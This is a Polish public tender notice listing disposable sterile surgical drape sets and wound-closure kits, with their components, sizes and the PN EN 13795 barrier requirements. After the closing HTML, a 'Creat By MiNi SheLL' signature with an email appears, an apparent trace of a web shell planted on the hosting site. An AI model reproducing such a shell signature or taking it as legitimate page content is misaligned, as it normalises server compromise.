2.Jednorazowe sterylne obłożenie pola operacyjnego, dwuwarstwowe, spełniające wymagania pełnej barierowości, zgodnie z normą PN EN 13795 . Nieprzepuszczalne dla płynów i  mikroorganizmów. Cechujące się zdolnością absorpcji płynów na całej powierzchni, wysoką odpornością na rozerwanie. Warstwa kleju umożliwiająca łatwe przyklejenie i odklejenie od ciała pacjenta, nie powodujące podrażnień i uczuleń. Bezzapachowe. 
Zestaw brzuszny"" do którego wchodzi:
- serweta na stolik MAYO  składana teleskopowo, folia piaskowana o wym: 80x145cm  2 szt.
- samoprzylepne serwety operacyjne o wym. 150x175  3 szt.
- samoprzylepne serwety operacyjne o wym. 90x100  5szt.
- serweta nieprzylepna na stolik pielęgniarki operacyjnej o wym. 75x90  1szt.
- uchwyt typu Velcro (rzep) o wym: 2x23  1szt.
- taśma samoprzylepna o wym: 10x50  1szt.
- torba na narzędzia samoprzylepna niedzielona PE o wym: 32x30 - 1 szt.
- podtrzymanie do skalpeli samoprzylepne  3 miejsca w kolorze kontrastowym do obłożenia  1szt.
- ręczniki celulozowe o  wym. min. 30x30  2szt.
- kompresy gazowe 17N8W z RTG 10x10cm - 5 x 10szt.
- chusty gazowe 20N4W z RTG i trokiem 45x45cm - 2 x 5szt.
- tupfery twarde z RTG 12x12cm - 1 x 10szt.
- serweta na stolik pielęgniarki operacyjnej o wym. min. 100x150  1szt.
(wymiary podano w cm) 
Produkt bezpiecznie pakowany do transportu. Każdy zestaw powinien posiadać min. 2 naklejki do dokumentacji. 
 W serwetach 150x175 warstwa kleju 2/3 środka serwety, boki bez warstwy klejącej.
3.Jednorazowe sterylne obłożenie pola operacyjnego, dwuwarstwowe, spełniające wymagania pełnej barierowości, zgodnie z normą PN EN 13795 . Nieprzepuszczalne dla płynów i  mikroorganizmów. Cechujące się zdolnością absorpcji płynów na całej powierzchni, wysoką odpornością na rozerwanie. Warstwa kleju umożliwiająca łatwe przyklejenie i odklejenie od ciała pacjenta, nie powodujące podrażnień i uczuleń. Bezzapachowe. 
Zestaw nerka do którego wchodzi:
- serweta na stolik MAYO  składana teleskopowo, folia piaskowana o wym: 80x145cm  2 szt.
- samoprzylepne serwety operacyjne o wym. 150x175  2 szt.
- samoprzylepne serwety operacyjne o wym. 90x100  3szt.
- serweta nieprzylepna na stolik pielęgniarki operacyjnej o wym. 75x90  1szt.
- uchwyt typu Velcro (rzep) o wym: 2x23  1szt.
- ręczniki celulozowe min. 30x30  2szt.
- taśma samoprzylepna 10x50  1 szt.
- torba na narzędzia samoprzylepna niedzielona PE o wym: 32x30 - 1 szt.
- podtrzymanie do skalpeli samoprzylepne  3 miejsca w kolorze kontrastowym do obłożenia  1szt.
- kompresy gazowe 17N8W z RTG 10x10cm - 5 x 10szt.
- chusty gazowe 20N4W z RTG i trokiem 45x45cm - 2 x 5szt.
- tupfery twarde z RTG 12x12cm - 1 x 10szt.
- serweta na stolik pielęgniarki operacyjnej o wym. min. 100x150  1szt.
(wymiary podano w cm) 
Produkt bezpiecznie pakowany do transportu.
W serwetach 150x175  warstwa kleju 2/3 środka serwety, boki bez warstwy klejącej. 
Każdy zestaw powinien posiadać 2 naklejki do dokumentacji.
4.Jednorazowe sterylne obłożenie pola operacyjnego, dwuwarstwowe, spełniające wymagania pełnej barierowości, zgodnie z normą PN EN 13795 . Nieprzepuszczalne dla płynów i  mikroorganizmów. Cechujące się zdolnością absorpcji płynów na całej powierzchni, wysoką odpornością na rozerwanie. Bezzapachowe. 
Zestaw TURB do którego wchodzi:
- serweta z otworem bez kleju (otwór 8x12) o wym: 75x200  1 szt.
- serweta na stolik piel. operacyjnej o wym:100x150  1szt.
- osłony na kończynę 75x120  - 2 szt.
- serweta nieprzylepna 75x90 - 1 szt.
(wymiary podano w cm) 
Produkt bezpiecznie pakowany do transportu. Każdy zestaw powinien posiadać min. 2 naklejki do dokumentacji.
5.Jednorazowe sterylne obłożenie pola operacyjnego, dwuwarstwowe, spełniające wymagania pełnej barierowości, zgodnie z normą PN EN 13795 . Nieprzepuszczalne dla płynów i  mikroorganizmów. Cechujące się zdolnością absorpcji płynów na całej powierzchni, wysoką odpornością na rozerwanie. Warstwa kleju umożliwiająca łatwe przyklejenie i odklejenie od ciała pacjenta, nie powodujące podrażnień i uczuleń. Bezzapachowe. 
Zestaw do laparoskopii - skład zestawu:
1 x serweta na stół narzędziowy 200x150 (opakowanie zestawu)
2 x serweta na stolik Mayo 80x145
1 x serweta do laparoskopii 250x320, otwór 32x28 (folia operacyjna na brzegach otworu), kieszenie obustronnie, prowadnice na dreny góra i dół;
2 x osłona na kable 12,5x230 składana teleskopowo,
1 x podstawka do skalpeli 3 miejsca
2 x uchwyt Velcro 2x23cm 
1 x taśma przylepna 10x50cm
2 x ręcznik celulozowy min. 30x30cm
(wymiary podano w cm).
Zestaw dodatkowo owinięty w papier krepowy. Produkt bezpiecznie pakowany do transportu.
Każdy zestaw powinien posiadać min. 2 naklejki do dokumentacji.
6.Jednorazowe sterylne obłożenie pola operacyjnego, dwuwarstwowe, spełniające wymagania pełnej barierowości, zgodnie z normą PN EN 13795 . Nieprzepuszczalne dla płynów i  mikroorganizmów. Cechujące się zdolnością absorpcji płynów na całej powierzchni, wysoką odpornością na rozerwanie. Warstwa kleju umożliwiająca łatwe przyklejenie i odklejenie od ciała pacjenta, nie powodujące podrażnień i uczuleń. Bezzapachowe. 
Zestaw do operacji urologicznych - skład zestawu:
1 x serweta na stół narzędziowy 140x190 (opakowanie zestawu)
1 x serweta urologiczna z torbą na płyny z sitem 185x200 i oknami 7x10 i 7cm
1 x taśma przylepna 10x50cm
4 x ręcznik celulozowy min. 30x30cm
(wymiary podano w cm).
Produkt bezpiecznie pakowany do transportu. 
Każdy zestaw powinien posiadać min. 2 naklejki do dokumentacji.
7.Jednorazowe sterylne obłożenie pola operacyjnego, dwuwarstwowe, spełniające wymagania pełnej barierowości, zgodnie z normą PN EN 13795. Nieprzepuszczalne dla płynów i  mikroorganizmów. Cechujące się zdolnością absorpcji płynów na całej powierzchni, wysoką odpornością na rozerwanie. Warstwa kleju umożliwiająca łatwe przyklejenie i odklejenie od ciała pacjenta, nie powodujące podrażnień i uczuleń. Bezzapachowe. 
Zestaw ambulatoryjny w skład którego wchodzi:
- serweta na stolik narzędziowy o wym: 150x150  1 szt.
- serweta samoprzylepna o wym: 75x75  4 szt.
- fartuch chirurgiczny pełnobarierowy z włókniny typu SMS rozmiar XL  2 szt.
(wymiary podano w cm.) Produkt bezpiecznie pakowany do transportu. 
Każdy zestaw powinien posiadać min. 2 naklejki do dokumentacji. 
8.Jednorazowe, sterylne obłożenie pola operacyjnego, dwuwarstwowe spełniające wymagania pełnej barierowości, zgodnie z normą PN EN 13795. Nieprzepuszczalne dla płynów i mikroorganizmów. Cechujące się zdolnością do absorpcji płynów, wysoką odpornością na rozerwanie. 
Zestaw uniwersalny z otworem w skład którego wchodzi: 
1. serweta na stolik narzędziowy 140 x 160 x 1 szt.; 
2. serweta z samoprzylepnym otworem (?10) 170 x 250 x 1 szt.; 
3. ręcznik celulozowy min. 30x30 x 1 szt.; (wymiary podano w cm). 
Produkt bezpiecznie pakowany do transportu. 
Każdy zestaw powinien posiadać min. 2 naklejki do dokumentacji. 
9.Sterylny zestaw do znieczulenia przewodowego w składzie:
1 x serweta na stół narzędziowy 75 x 45 cm (opakowanie zestawu)
1 x serweta epiduralna przylepna 60 x 75 cm, otwór przylepny romb 10 x 10 cm decentralnie
1 x igła injekcyjna 25 G, 0,50 x 40 mm
1 x igła injekcyjna 18 G, 1,20 x 40 mm
1 x strzykawka 2 ml Luer, 2 części
1 x strzykawka 5 ml Luer, 2 części
1 x opatrunek na ranę operacyjną 7,2 x 5 cm
1 x kleszczyki plastikowe proste do mycia pola operacyjnego 19 cm
3 x kompres z włókniny 10 x 10 cm, 6 warstw
6 x tupfer z gazy 24 x 24 cm, 20 nitek
1 x pojemnik plastikowy 120 ml, z podziałką
Produkt bezpiecznie pakowany do transportu. 
Każdy zestaw powinien posiadać min. 2 naklejki do dokumentacji. 
10.Jednorazowe, sterylne obłożenie pola operacyjnego, min. dwuwarstwowe spełniające wymagania pełnej barierowości, zgodnie z normą PN EN 13795. Nieprzepuszczalne dla płynów i mikroorganizmów. Cechujące się zdolnością do absorpcji płynów, wysoką odpornością na rozerwanie. 
Zestaw brzuszno-kroczowy w skład którego wchodzi: 
1. serweta na stolik narzędziowy wzmocniona 140 x 190 cm 
2. serweta na stolik Mayo wzmocniona 80 x 145 cm 
3. serweta brzuszno-kroczowa z padami chłonymi (otwory19 x 29 cm i 9 x 12 cm) 230 x 250 cm (pad brzuch min. 60 x 120 cm, pad krocze min. 50 x 85 cm)
4. ręczniki celulozowe min. 30 x 30 cm x 4 szt.
Produkt bezpiecznie pakowany do transportu. 
Każdy zestaw powinien posiadać min. 2 naklejki do dokumentacji.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33141000-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b><br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Jednorazowe, sterylne obłożenia pola operacyjnego - serwety <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.Jednorazowa samoprzylepna serweta operacyjna, dwuwarstwowa, o wym. 75x90cm spełniająca wymagania pełnej barierowości, zgodnie z normą PN EN 13795. Nieprzepuszczalna dla płynów i  mikroorganizmów. Cechująca się zdolnością absorpcji płynów na całej powierzchni, wysoką odpornością na rozerwanie. Bezzapachowa. 
2.Jednorazowa, samoprzylepna serweta operacyjna, dwuwarstwowa, o wym. 90x100cm spełniająca wymagania pełnej barierowości, zgodnie z normą PN EN 13795 . Nieprzepuszczalna dla płynów i  mikroorganizmów. Cechująca się zdolnością absorpcji płynów na całej powierzchni, wysoką odpornością na rozerwanie. Bezzapachowa. 
3.Jednorazowa samoprzylepna serweta operacyjna, dwuwarstwowa, o wym. 150x175 spełniająca wymagania pełnej barierowości, zgodnie z normą PN EN 13795 . Nieprzepuszczalna dla płynów i  mikroorganizmów. Cechująca się zdolnością absorpcji płynów na całej powierzchni, wysoką odpornością na rozerwanie. Bezzapachowa. 
4.Jednorazowa serweta operacyjna, dwuwarstwowa, z otworem 7cm o wym. 75x90 spełniająca wymagania pełnej barierowości, zgodnie z normą PN EN 13795. Nieprzepuszczalna dla płynów i  mikroorganizmów. Cechująca się zdolnością absorpcji płynów na całej powierzchni, wysoką odpornością na rozerwanie. Bezzapachowa. 
5.Taśma samoprzylepna o wym 10x50cm
6.Jednorazowa serweta operacyjna samoprzylepna, dwuwarstwowa,  do znieczulenia przewodowego o wym: 60x90cm z otworem 10x12cm spełniająca wymagania pełnej barierowości, zgodnie z normą PN EN 13795 . Nieprzepuszczalna dla płynów i  mikroorganizmów. Cechująca się zdolnością absorpcji płynów na całej powierzchni, wysoką odpornością na rozerwanie. Bezzapachowa. (próbka)
7.Jednorazowa serweta na stolik pielęgniarki operacyjnej, dwuwarstwowa o wym. 75 cm x 90 cm spełniająca wymagania pełnej barierowości zgodnie z normą PN EN 13795. Nieprzepuszczalna dla płynów i mikroorganizmów. Cechująca się zdolnością absorpcji płynów na całej powierzchni, wysoką odpornością na rozerwanie. Bezzapachowa.
8.Sterylny uchwyt typu rzep 2 x 23 cm
9.Jednorazowa serweta nieprzylepna operacyjna o wym. 45 x 75 cm, spełniająca wymagania pełnej barierowości zgodnie z normą PN EN 13795. Nieprzemakalna dla płynów i mikroorganizmów. Cechująca się zdolnością absorpcji płynów na całej powierzchni, wysoką odpornością na rozerwanie. Bezzapachowa.
10.Jednorazowa serweta na stolik Mayo o wym. 80 x 1455 cm, spełniająca wymagania pełnej barierowości zgodnie z normą PN EN 13795. Nieprzemakalna dla płynów i mikroorganizmów. Cechująca się zdolnością absorpcji płynów w strefie roboczej, wysoką odpornością na rozerwanie. Składana teleskopowo. Bezzapachowa.
11.Sterylna kieszeń foliowa samoprzylepna 1-sekcyjna o wym. 30 x 32 cm
12.Sterylna kieszeń foliowa samoprzylepna 2-sekcyjna o wym. 43x 38 cm<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33141000-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b><br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Jednorazowe, sterylne obłożenia pola operacyjnego - zestaw do zamykania małych ran <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Sterylny zestaw do zamykania małych ran w składzie:
1 x serweta na stół narzędziowy (owinięcie zestawu) 75 x 45 cm   
1 x serweta 60 x 50 cm; otwór 5 cm centralnie     
1 x Nożyczki chirurgiczne proste ostro tępe 14,5 cm  
1 x Imadło chirurgiczne typu Mayo-Hegar 14 cm    
1 x Pęseta chirurgiczna standardowa prosta 14 cm   
1 x kleszczyki plastikowe proste 14 cm         
1 x 7,2 x 5 cm opatrunek pooperacyjny    
2 x tupfer z gazy 20 x 20 cm, 20 nitek   
8 x 7,5 x 7,5 cm kompres z włókniny.
Produkt bezpiecznie pakowany do transportu. 
Każdy zestaw powinien posiadać min. 2 naklejki do dokumentacji.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33141000-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b><br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com